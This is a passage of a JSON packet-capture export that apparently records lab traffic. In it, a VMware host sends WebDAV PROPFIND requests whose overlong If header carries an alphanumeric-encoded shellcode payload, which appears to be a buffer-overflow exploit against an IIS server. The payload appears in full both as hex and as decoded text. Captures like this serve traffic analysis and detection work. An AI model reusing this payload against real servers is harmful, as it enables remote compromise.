"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00000153",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "41021",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "41021",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "62",
|
||
"tcp.len": "231",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3077957227",
|
||
"tcp.nxtseq": "1680",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3067336022",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00002ca5",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:54:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:54:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868628",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000342000",
|
||
"tcp.analysis.bytes_in_flight": "1679",
|
||
"tcp.analysis.push_bytes_sent": "1679"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000755000",
|
||
"tcp.time_delta": "0.000052000"
|
||
},
|
||
"tcp.payload": "33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "396",
|
||
"tcp.segment": "397",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1679",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:5a:47:62:77:4d:74:41:4f:44:68:59:53:72:7a:76:64:6a:46:53:58:7a:42:4f:71:6f:55:6b:73:75:41:43:51:71:77:69:6c:47:56:42:4e:56:77:52:7a:77:41:62:56:71:4c:64:4f:45:6f:4e:63:73:54:61:42:52:4c:66:4d:61:6c:67:5a:71:6e:53:62:56:56:4a:59:76:73:59:78:6d:54:4e:79:e5:89:99:e7:a9:97:e6:b9:a2:e6:85:b0:e4:a5:87:e6:9d:99:e7:81:ba:e7:a5:a7:e4:a1:8f:e7:85:85:e4:8d:a4:e5:85:90:e7:8d:b9:e4:99:b3:e6:a9:99:e4:b5:ac:c8:82:c8:82:e1:8b:80:e6:a0:83:e7:81:8b:e7:a9:90:e6:ad:85:e6:85:82:e4:99:82:e7:91:a5:e4:bd:a5:e6:b9:88:e4:95:ac:e4:a1:a8:e4:89:aa:e5:a9:ab:e5:a5:8e:e4:9d:ad:e4:b9:8a:e4:a9:ac:e4:b1:aa:e4:8d:89:e4:b9:b0:e5:8d:b4:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:4c:43:52:65:6c:54:4a:73:50:63:79:65:51:73:67:50:61:51:77:4d:71:43:70:70:68:57:78:49:6f:75:4f:45:7a:67:58:50:4a:72:70:6d:74:56:7a:4c:42:4d:45:58:56:6c:74:7a:48:6f:77:49:71:48:46:5a:6e:44:4e:54:66:53:4d:79:75:69:58:46:66:49:43:74:6c:55:42:44:44:72:79:66:e7:95:8a:e4:91:86:e4:b5:b5:e7:95:b7:e6:85:a6:e4:95:b5:e5:a1:ae:e7:81:ba:e7:85:8d:e7:89:9a:e4:a5:ba:e7:a1:a5:e7:89:89:e4:99:b6:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:9d:ab:e4:91:9a:e7:89:ac:e4:a9:b4:e1:8f:80:e6:a0:83:e4:9d:aa:e4:a5:b3:e6:9d:b6:e5:a9:98:e4:91:a4:e6:8d:90:e6:a1:b0:e7:99:8a:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/ZGbwMtAODhYSrzvdjFSXzBOqoUksuACQqwilGVBNVwRzwAbVqLdOEoNcsTaBRLfMalgZqnSbVVJYvsYxmTNy<4E><79><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/LCRelTJsPcyeQsgPaQwMqCpphWxIouOEzgXPJrpmtVzLBMEXVltzHowIqHFZnDNTfSMyuiXFfICtlUBDDryf<79><66><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "399"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.826024000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.826024000",
|
||
"frame.time_delta": "0.000047000",
|
||
"frame.time_delta_displayed": "0.005021000",
|
||
"frame.time_relative": "17.076964000",
|
||
"frame.number": "407",
|
||
"frame.len": "295",
|
||
"frame.cap_len": "295",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "281",
|
||
"ip.id": "0x00003f72",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000f105",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "44903",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "44903",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "63",
|
||
"tcp.len": "229",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3888614167",
|
||
"tcp.nxtseq": "1678",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2489033944",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000cea8",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:59:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:59:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868633",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000344000",
|
||
"tcp.analysis.bytes_in_flight": "1677",
|
||
"tcp.analysis.push_bytes_sent": "1677"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000717000",
|
||
"tcp.time_delta": "0.000047000"
|
||
},
|
||
"tcp.payload": "4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "406",
|
||
"tcp.segment": "407",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1677",
|
||
